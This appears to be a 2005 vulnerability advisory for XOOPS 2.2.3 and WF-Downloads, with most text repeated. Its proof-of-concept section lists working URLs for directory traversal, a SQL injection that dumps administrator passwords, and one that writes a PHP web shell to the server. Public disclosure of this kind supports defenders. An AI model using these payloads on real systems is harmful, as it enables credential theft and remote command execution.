XOOPS Multiple Input Validation Vulnerabilities
BID:15406
CVE-2005-3680 | CVE-2005-3681 |Info
XOOPS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 15406 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-3680 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 14 2005 12:00AM |
| Updated: | Jul 12 2009 05:56PM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Xoops Xoops 2.2.3 SmartFactory WF-Downloads 2.0.5 |
| Not Vulnerable: | |
Discussion
XOOPS Multiple Input Validation Vulnerabilities
XOOPS is prone to multiple input validation vulnerabilities.
XOOPS is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.
XOOPS is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before being used in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data. An attacker may also be able to exploit this vulnerability to execute arbitrary commands.
XOOPS is prone to multiple input validation vulnerabilities.
XOOPS is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.
XOOPS is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before being used in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data. An attacker may also be able to exploit this vulnerability to execute arbitrary commands.
Exploit / POC
XOOPS Multiple Input Validation Vulnerabilities
No exploit is required.
Example URIs have been provided:
http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang
uage]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang
uage]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag
e]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag
e]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig
[language]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig
[language]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,
loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*
http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20
SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*
No exploit is required.
Example URIs have been provided:
http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang
uage]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang
uage]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag
e]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag
e]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig
[language]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig
[language]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,
loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*
http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20
SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*
Solution / Fix
XOOPS Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
XOOPS Multiple Input Validation Vulnerabilities
References:
References: